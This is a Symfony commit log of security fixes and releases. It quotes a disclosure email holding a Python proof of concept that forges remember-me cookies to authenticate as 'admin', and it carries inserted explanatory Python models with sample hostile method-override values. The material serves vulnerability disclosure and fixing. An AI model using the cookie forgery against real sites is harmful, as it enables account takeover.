Commit Graph

25783 Commits

Author SHA1 Message Date
Fabien Potencier 4d0899c5e3 bumped version 2019-04-17 18:37:53 +02:00
Fabien Potencier 649bb0095f fixed version 2019-04-17 18:37:23 +02:00
Fabien Potencier 20f9c87a12
Merge pull request #31144 from fabpot/release-2.7.51
released v2.7.51
2019-04-17 17:44:35 +02:00
Fabien Potencier 2636414523 updated VERSION for 2.7.51 2019-04-17 17:43:55 +02:00
Fabien Potencier 343865d847 updated CHANGELOG for 2.7.51 2019-04-17 17:34:40 +02:00
Nicolas Grekas 789a34ad76 security #cve-2019-10910 [DI] Check service IDs are valid (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[DI] Check service IDs are valid

Based on #87

Commits
-------

0671884f41 [DI] Check service IDs are valid
2019-04-16 13:06:12 +02:00
Nicolas Grekas 783ef2fb1d security #cve-2019-10909 [FrameworkBundle][Form] Fix XSS issues in the form theme of the PHP templating engine - CVE-2019-10909 (stof)
This PR was merged into the 2.7 branch.

Discussion
----------

[FrameworkBundle][Form] Fix XSS issues in the form theme of the PHP templating engine - CVE-2019-10909

https://www.intigriti.com/researcher/submission/CfDJ8Pja6NZvkpNCmx5vVyiGSn4K0Hgfyo6ynNDaSmw63JqRiMJ1Arv1xOxeLFRsv7xVI0MAspfOj8pKsT-ruB6Pfx5HvSOKt0UzPUqqpEWtGNo2kb3xuLP19uhpuMvrZOXnDA

![image](https://user-images.githubusercontent.com/211740/55671589-dc3d0700-5891-11e9-8420-2ab8961c69db.png)

Commits
-------

e645e2aa7e Fix XSS issues in the form theme of the PHP templating engine
2019-04-16 11:58:49 +02:00
Nicolas Grekas 2681a5f4ba security #cve-2019-10911 [Security] Add a separator in the remember me cookie hash (pborreli)
This PR was merged into the 2.7 branch.

Discussion
----------

[Security] Add a separator in the remember me cookie hash

Fabien found this issue reported back in 2013 but it was never resolved. Pascal (@pborreli) did the original patch.

```
> -------- Original Message --------
> Subject: No structure in remember me MAC
> Date: Tue, 4 Jun 2013 09:46:21 +0100
> From: Jon Cave <jon@joncave.co.uk>
> To: security@symfony.com
>
> I have discovered a vulnerability in the Symfony framework that
> affects version 2.3 and all other 2.x releases. The vulnerability
> would allow an attacker to authenticate as a privileged user on sites
> with user registration and remember me login functionality enabled.
>
> The problem is that there is no structure in the data that is passed
> to the hash function when generating a MAC for remember me cookies.
> From
> Symfony\Component\Security\Http\RememberMe\TokenBasedRememberMeServices::generateCookieHash():
>
>   return hash('sha256',
> $class.$username.$expires.$password.$this->getKey());
>
> This means that there are many inputs that result in the same hash.
> For example, a user can register with username "admin9" and receive
> the following cookie: "<class>:admin9:1370334467:<hash>" where <hash>
> is hash('sha256', "<class>admin91370334467<password><key>"). This
> cookie can then be modified to be: "<class>:admin:91370334467:<hash>"
> where <hash> is the same value as before. The application will load
> the "admin" user and recognise the provided hash as valid! (NB: I left
> out some base64 encoding to make things more obvious.)
>
> The solution to this is to use the same separator when generating the
> hash as is done when encoding the cookie, e.g.:
>
>   return hash('sha256', $class . ':' . $username . ':' . $expires .
> ':' . $password . ':' . $this->getKey());
>
> It would also be a good idea to switch to using hash_hmac():
>
>   return hash_hmac('sha256', $class . ':' . $username . ':' . $expires
> . ':' . $password, $this->getKey());
>
> This is because HMAC is a stronger MAC construction than the secret
> suffix one currently being used [1].
>
> Let me know if you have any questions.
>
> Cheers,
> Jon
> http://joncave.co.uk/
> @joncave
>
> [1]
> http://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/
>
> Proof of concept code to perform the attack given a valid cookie to modify:
>
> import base64
> import requests
> import sys
>
> if __name__ == "__main__":
>     if len(sys.argv) != 3:
>         print("COOKIE URL")
>         sys.exit(1)
>
>     cookie = sys.argv[1]  # Current cookie (the REMEMBERME value)
>     url = sys.argv[2]     # URL
>
>     # Outer layer: base64(class:base64(username):expires:hash)
>     cls, name, expires, mac = base64.b64decode(cookie).decode().split(":")
>
>     # Tamper: move the last character of the username onto the front of
>     # the expiry; the concatenated hash input is unchanged, so the MAC
>     # still verifies for the shorter username
>     name = base64.b64decode(name).decode()
>     expires = name[-1] + expires
>     name = base64.b64encode(name[:-1].encode()).decode()
>
>     # Reconstruct
>     cookie = ":".join([cls, name, expires, mac])
>
>     print("Using cookie: " + cookie)
>     print()
>
>     cookies = {"REMEMBERME": base64.b64encode(cookie.encode()).decode()}
>     print(requests.get(url, cookies=cookies).text)
>
>
```

Commits
-------

6356982017 [Security] Add a separator in the remember me cookie hash
2019-04-16 11:58:36 +02:00
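Added example, not Symfony's code and not part of the report quoted above: a Python model of the two hash constructions and of the cookie layout the email describes, run end to end so that the tampered cookie logs in as `admin` under the old concatenation and is rejected under the separated HMAC. The secret key, the class name and the user store are constructed fixtures. Because the stored password is itself an input to the hash, both accounts are given the same stored value here; that isolates the missing-separator flaw the report is about.

```python
import base64
import hashlib
import hmac

# Constructed fixtures (not Symfony's values): an application secret and a user
# store. The stored password is part of the hash input, so both accounts carry
# the same stored value to isolate the missing-separator flaw.
KEY = b"constructed-app-secret"
CLS = "App\\Entity\\User"
USERS = {
    "admin": b"constructed-stored-password",
    "admin9": b"constructed-stored-password",
}


def vulnerable_hash(cls: str, username: str, expires: str, password: bytes, key: bytes) -> str:
    """Pre-fix construction from the report: sha256(class.username.expires.password.key).
    Nothing marks where one field ends and the next begins."""
    data = cls.encode() + username.encode() + expires.encode() + password + key
    return hashlib.sha256(data).hexdigest()


def fixed_hash(cls: str, username: str, expires: str, password: bytes, key: bytes) -> str:
    """Fixed construction: ':' between fields (the cookie's own delimiter) and
    HMAC-SHA256 keyed with the secret instead of an ad-hoc secret-suffix hash."""
    msg = b":".join([cls.encode(), username.encode(), expires.encode(), password])
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def encode_cookie(cls: str, username: str, expires: str, digest: str) -> str:
    """Cookie layout described in the report: base64(class:base64(username):expires:hash)."""
    inner = ":".join([cls, base64.b64encode(username.encode()).decode(), expires, digest])
    return base64.b64encode(inner.encode()).decode()


def decode_cookie(cookie: str):
    cls, name_b64, expires, digest = base64.b64decode(cookie).decode().split(":")
    return cls, base64.b64decode(name_b64).decode(), expires, digest


def issue_cookie(username: str, expires: str, hash_fn) -> str:
    """What the server hands out after a successful 'remember me' login."""
    digest = hash_fn(CLS, username, expires, USERS[username], KEY)
    return encode_cookie(CLS, username, expires, digest)


def tamper(cookie: str) -> str:
    """The report's attack: shift the last character of the username onto the
    front of the expiry. The concatenated hash input is byte-for-byte unchanged."""
    cls, username, expires, digest = decode_cookie(cookie)
    return encode_cookie(cls, username[:-1], username[-1] + expires, digest)


def auto_login(cookie: str, hash_fn):
    """Server-side check: recompute the hash for the user named in the cookie and
    compare in constant time. Returns the authenticated username or None."""
    cls, username, expires, digest = decode_cookie(cookie)
    if username not in USERS:
        return None
    expected = hash_fn(cls, username, expires, USERS[username], KEY)
    if not hmac.compare_digest(expected, digest):
        return None
    return username


def demo():
    """Returns who each construction logs in once the admin9 cookie is tampered with."""
    results = {}
    for label, fn in (("vulnerable", vulnerable_hash), ("fixed", fixed_hash)):
        cookie = issue_cookie("admin9", "1370334467", fn)
        assert auto_login(cookie, fn) == "admin9"  # the honest cookie works either way
        results[label] = auto_login(tamper(cookie), fn)
    return results


if __name__ == "__main__":
    print(demo())  # {'vulnerable': 'admin', 'fixed': None}
```

The separator is enough on its own to break this particular attack because the cookie is split on `:` into exactly four parts, so a decoded expiry can never contain one and no username containing `:` can be re-split into a different username/expiry pair that the cookie format accepts; switching to HMAC additionally drops the ad-hoc secret-suffix construction the report's reference warns against. The constant-time comparison in `auto_login` is the other detail worth keeping when porting this check.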
Nicolas Grekas 722efa1f17 security #cve-2019-10913 [HttpFoundation] reject invalid method override (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[HttpFoundation] reject invalid method override

| Q             | A
| ------------- | ---
| Branch?       | 3.4
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

From https://www.intigriti.com/company/submission/CfDJ8Pja6NZvkpNCmx5vVyiGSn7LV-k0ZJ4JlDGSPAaBG1sG1aNinWbVYRos8ldmLPCMSPdHLrwLufz8lXoJ-UNS3XW1_Xkxc7u9rIaENVJ_-nQV_uic7D1tmRhB6PFiBkRgBA

About `Request::getMethod`:

> There will be developers who expect the HTTP method to be valid and therefore will use the return value unescaped in SQL, HTML or other dangerous places.

This is what this PR improves, forcing only ASCII letters in overridden methods.

> It is possible to set the header to "GET", "HEAD", "OPTIONS" and "TRACE". Because of this, the method Request::isMethodSafe() returns true, although the actual http method is post.

I don't think this creates any issue: not fixed.

> Normally, if you try to provide a request body in a GET-Request, the web server discards the request body. This security functionality can be completely bypassed through this. [...] Recommendation: Remove the parsed body params from the request object, if a method without a body is set.

I don't think this is valid: actually we *do* populate `$request->request` with the body of GET requests when some is sent.

> Even if very rare, some users still use old browsers where CORS is not available. Or a server admin allowed headers to be cross-origin. In those cases this functionality enables CSRF attacks, if the developer trusts the HTTP method. (E.g. Shopware does this.)

I don't understand this, not addressed.

ping @michaelcullum if you want to answer the person.
And others to review :)

Commits
-------

6ce9991392 [HttpFoundation] reject invalid method override
2019-04-16 11:58:21 +02:00
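Added example, not Symfony's code: a Python model of the override rule this PR describes (only ASCII letters may form an overridden method) around the behaviour of `Request::getMethod` as the discussion describes it. The lookup order (header, then `_method` in the body, then the query string), the restriction to real POST requests and the canonicalised header names are assumptions of this model; the sample requests are constructed, not captured traffic. It also shows the anchoring trap that a plain `^[A-Z]+$` match leaves open.

```python
import re
from typing import Mapping, Optional

# Only plain ASCII letters may form an overridden method name. [A-Za-z] in
# Python's re is ASCII-only; str.isalpha() would not be, since it accepts any
# Unicode letter.
_METHOD_TOKEN = re.compile(r"[A-Za-z]+")


class SuspiciousOperation(ValueError):
    """Raised when the override value cannot be a legitimate HTTP method."""


def is_valid_override(value: str) -> bool:
    """fullmatch plays the role of PCRE's /D modifier: 'GET\\n' must not pass as
    'GET', which a '^...$' match would allow because $ accepts a trailing newline."""
    return _METHOD_TOKEN.fullmatch(value) is not None


def naive_anchor_match(value: str) -> bool:
    """The trap the hardened check avoids: '$' still matches before a final newline."""
    return re.match(r"^[A-Za-z]+$", value) is not None


def resolve_method(real_method: str, headers: Mapping[str, str],
                   body: Mapping[str, str], query: Mapping[str, str],
                   override_enabled: bool = True) -> str:
    """Model of Request::getMethod() (assumed order, not Symfony's code): the
    override is honoured only on a real POST, reading X-HTTP-Method-Override,
    then the _method body field, then the _method query parameter. Header names
    are assumed already canonicalised by the caller."""
    method = real_method.upper()
    if method != "POST" or not override_enabled:
        return method
    override: Optional[str] = (headers.get("X-HTTP-Method-Override")
                               or body.get("_method") or query.get("_method"))
    if not override:
        return method
    if not is_valid_override(override):
        raise SuspiciousOperation(f"Invalid method override {override!r}")
    return override.upper()


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", {"X-HTTP-Method-Override": "delete"}, {}, {}),
    ("POST", {}, {"_method": "PUT"}, {}),
    ("GET", {"X-HTTP-Method-Override": "DELETE"}, {}, {}),   # ignored: not a POST
    ("POST", {"X-HTTP-Method-Override": "GET\n"}, {}, {}),  # trailing newline
    ("POST", {}, {"_method": "<script>alert(1)</script>"}, {}),
    ("POST", {}, {}, {"_method": "G\u00c9T"}),               # non-ASCII letter
]


def classify(samples=SAMPLES):
    """Returns the resolved method per sample, or 'rejected' where the override is refused."""
    out = []
    for real, headers, body, query in samples:
        try:
            out.append(resolve_method(real, headers, body, query))
        except SuspiciousOperation:
            out.append("rejected")
    return out


if __name__ == "__main__":
    for sample, result in zip(SAMPLES, classify()):
        print(sample, "->", result)
```

The rejection is deliberately an exception rather than a silent fallback to POST: the override value is attacker-controlled, and code downstream that treats the method as a trusted token (the SQL/HTML sinks the reporter mentions) should never see a value that could not have come from a well-formed request.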
Fabien Potencier 0848ce2c7f
Merge pull request #29486 from fabpot/release-2.7.50
released v2.7.50
2018-12-06 14:40:04 +00:00
Fabien Potencier 95222d6f80 bumped version 2018-12-06 14:39:39 +00:00
Fabien Potencier 161aa25779 updated CHANGELOG for 2.7.50 2018-12-06 14:38:57 +00:00
Nicolas Grekas 9b10db2207 fix CI 2018-12-06 11:49:24 +00:00
Nicolas Grekas f27dd4b5be security #cve-2018-19790 [Security\Http] detect bad redirect targets using backslashes (xabbuh)
This PR was merged into the 2.7 branch.

Discussion
----------

[Security\Http] detect bad redirect targets using backslashes

| Q             | A
| ------------- | ---
| Branch?       | 2.7
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | #76
| License       | MIT
| Doc PR        |

Commits
-------

99a0cec0a6 [Security\Http] detect bad redirect targets using backslashes
2018-12-06 11:09:35 +00:00
Nicolas Grekas b65e6f1a47 security #cve-2018-19789 [Form] Filter file uploads out of regular form types (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[Form] Filter file uploads out of regular form types

| Q             | A
| ------------- | ---
| Branch?       | 2.7
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

This PR filters uploaded files out of the data processed by any form type except `FileType`.

Commits
-------

205a44ea7d [Form] Filter file uploads out of regular form types
2018-12-06 11:08:15 +00:00
Christian Flothmann 99a0cec0a6 [Security\Http] detect bad redirect targets using backslashes 2018-11-29 16:25:45 +01:00
Nicolas Grekas 205a44ea7d [Form] Filter file uploads out of regular form types 2018-11-29 16:24:44 +01:00
Nicolas Grekas cb8302cb76 Fix CI 2018-11-29 16:06:32 +01:00
Nicolas Grekas c40cf26c5f minor #28258 [travis] fix composer.lock invalidation for deps=low (nicolas-grekas)
This PR was merged into the 2.8 branch.

Discussion
----------

[travis] fix composer.lock invalidation for deps=low

| Q             | A
| ------------- | ---
| Branch?       | 2.8
| Bug fix?      | no
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

Commits
-------

41ffba1916 [travis] fix composer.lock invalidation for deps=low
2018-08-24 14:41:13 +02:00
Nicolas Grekas 74aef7a3ec [travis] fix composer.lock invalidation for PRs patching several components 2018-08-19 14:57:53 +02:00
Nicolas Grekas caf69aa3c4 [travis] fix composer.lock invalidation for deps=low 2018-08-19 11:09:49 +02:00
Fabien Potencier e61cb8e14a minor #28199 [travis][appveyor] use symfony/flex to accelerate builds (nicolas-grekas)
This PR was merged into the 2.8 branch.

Discussion
----------

[travis][appveyor] use symfony/flex to accelerate builds

| Q             | A
| ------------- | ---
| Branch?       | 2.8
| Bug fix?      | no
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

Playing with https://github.com/symfony/flex/pull/409

The optimization is required because appveyor is transiently failing with OOM errors, see e.g.
https://ci.appveyor.com/project/fabpot/symfony/build/1.0.39377

Commits
-------

940ec8f2d5 [travis][appveyor] use symfony/flex to accelerate builds
2018-08-18 18:48:18 +02:00
Nicolas Grekas 80980330db [travis] ignore ordering when validating composer.lock files for deps=low 2018-08-07 17:20:51 +02:00
Nicolas Grekas 4b13fc5d9e minor #28146 [travis] cache composer.lock files for deps=low (nicolas-grekas)
This PR was merged into the 2.8 branch.

Discussion
----------

[travis] cache composer.lock files for deps=low

| Q             | A
| ------------- | ---
| Branch?       | 2.8
| Bug fix?      | no
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

I just realized that the resolved package versions for lowest deps depends only on the root composer.json, and not on transitive deps.
This means we can cache the lock files and save ~10 minutes required to resolve the lowest deps of the SecurityBundle.

Commits
-------

caaa74cd9b [travis] cache composer.lock files for deps=low
2018-08-07 11:35:46 +02:00
Nicolas Grekas 79ce6eae8f fix ci 2018-08-03 15:16:18 +02:00
Nicolas Grekas fa4d95a3ba [travis] fix requiring mongodb/mongodb before composer up 2018-08-03 14:54:05 +02:00
Nicolas Grekas 548e9f71b7 minor #28114 [travis] merge "same Symfony version" jobs in one (nicolas-grekas)
This PR was merged into the 2.8 branch.

Discussion
----------

[travis] merge "same Symfony version" jobs in one

| Q             | A
| ------------- | ---
| Branch?       | 2.8
| Bug fix?      | no
| New feature?  |
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

This allows us to consume fewer jobs and save the 1 to 2 minute bootstrap time of workers.

Commits
-------

9857ca07aa [travis] merge "same Symfony version" jobs in one
2018-08-03 13:24:48 +02:00
Fabien Potencier 79e3904031 minor #28110 [2.7] Make CI green (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[2.7] Make CI green

| Q             | A
| ------------- | ---
| Branch?       | 2.7
| Bug fix?      | no
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

2.7 still receives security fixes for a few more months, let's keep its CI green.

Commits
-------

ced4201b43 [2.7] Make CI green
2018-08-02 11:14:02 +02:00
Nicolas Grekas ced4201b43 [2.7] Make CI green 2018-08-02 08:59:56 +02:00
Fabien Potencier 3425d87198
Merge pull request #28098 from fabpot/release-2.7.49
released v2.7.49
2018-08-01 15:57:05 +02:00
Fabien Potencier 62184c0a33 updated VERSION for 2.7.49 2018-08-01 15:56:47 +02:00
Fabien Potencier 5999020906 updated CHANGELOG for 2.7.49 2018-08-01 15:51:13 +02:00
Nicolas Grekas 9cfcaba0bf security #cve-2018-14774 [HttpKernel] fix trusted headers management in HttpCache and InlineFragmentRenderer (nicolas-grekas)
* commit '08a32d44b6':
  [HttpKernel] fix trusted headers management in HttpCache and InlineFragmentRenderer
2018-08-01 14:45:04 +02:00
Nicolas Grekas 08a32d44b6 [HttpKernel] fix trusted headers management in HttpCache and InlineFragmentRenderer 2018-08-01 14:44:26 +02:00
Nicolas Grekas efcde3d068 security #cve-2018-14773 [HttpFoundation] Remove support for legacy and risky HTTP headers (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[2.7][HttpFoundation] Remove support for legacy and risky HTTP headers

Commits
-------

eda2b20df5 [HttpFoundation] Remove support for legacy and risky HTTP headers
2018-08-01 10:43:33 +02:00
Nicolas Grekas eda2b20df5 [HttpFoundation] Remove support for legacy and risky HTTP headers 2018-07-31 21:55:31 +02:00
Fabien Potencier 34d6116e2b
Merge pull request #27374 from fabpot/release-2.7.48
released v2.7.48
2018-05-25 13:46:22 +02:00
Fabien Potencier 81564555d8 updated VERSION for 2.7.48 2018-05-25 13:45:58 +02:00
Fabien Potencier fb79294e76 update CONTRIBUTORS for 2.7.48 2018-05-25 13:45:39 +02:00
Fabien Potencier 548f1cbf73 updated CHANGELOG for 2.7.48 2018-05-25 13:45:30 +02:00
Fabien Potencier ab32125187 bug #27359 [HttpFoundation] Fix perf issue during MimeTypeGuesser initialization (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[HttpFoundation] Fix perf issue during MimeTypeGuesser initialization

| Q             | A
| ------------- | ---
| Branch?       | 2.7
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | #27307
| License       | MIT
| Doc PR        | -

introduced in #26886

![image](https://user-images.githubusercontent.com/243674/40451947-918f5358-5ee0-11e8-9f1a-cf707bf3cefa.png)

Commits
-------

f8e7a18d1b [HttpFoundation] Fix perf issue during MimeTypeGuesser initialization
2018-05-25 12:53:06 +02:00
Fabien Potencier 2f34263a1a fixed constraints 2018-05-25 08:35:17 +02:00
Fabien Potencier 1151ab28c0 bumped dep 2018-05-25 08:20:37 +02:00
Fabien Potencier 87153549f6 bumped dep 2018-05-25 07:45:02 +02:00
Fabien Potencier b20e83562e security #cve-2018-11408 [SecurityBundle] Fail if security.http_utils cannot be configured
* cve-2018-11408-2.7:
  [SecurityBundle] Fail if security.http_utils cannot be configured
2018-05-24 15:22:46 +02:00
Nicolas Grekas c003b7a247 [SecurityBundle] Fail if security.http_utils cannot be configured 2018-05-24 15:22:37 +02:00
Fabien Potencier 319e1bdd43 security #cve-2018-11406 clear CSRF tokens when the user is logged out
* cve-2018-11406-2.7:
  clear CSRF tokens when the user is logged out
2018-05-24 14:39:56 +02:00
Christian Flothmann 4b91c171af clear CSRF tokens when the user is logged out 2018-05-24 14:39:52 +02:00
Nicolas Grekas f8e7a18d1b [HttpFoundation] Fix perf issue during MimeTypeGuesser initialization 2018-05-23 23:23:26 +02:00
Fabien Potencier fa5bf4b17d security #cve-2018-11385 Adding session strategy to ALL listeners to avoid *any* possible fixation
* cve-2018-11385-2.7:
  Adding session strategy to ALL listeners to avoid *any* possible fixation
2018-05-23 15:50:13 +02:00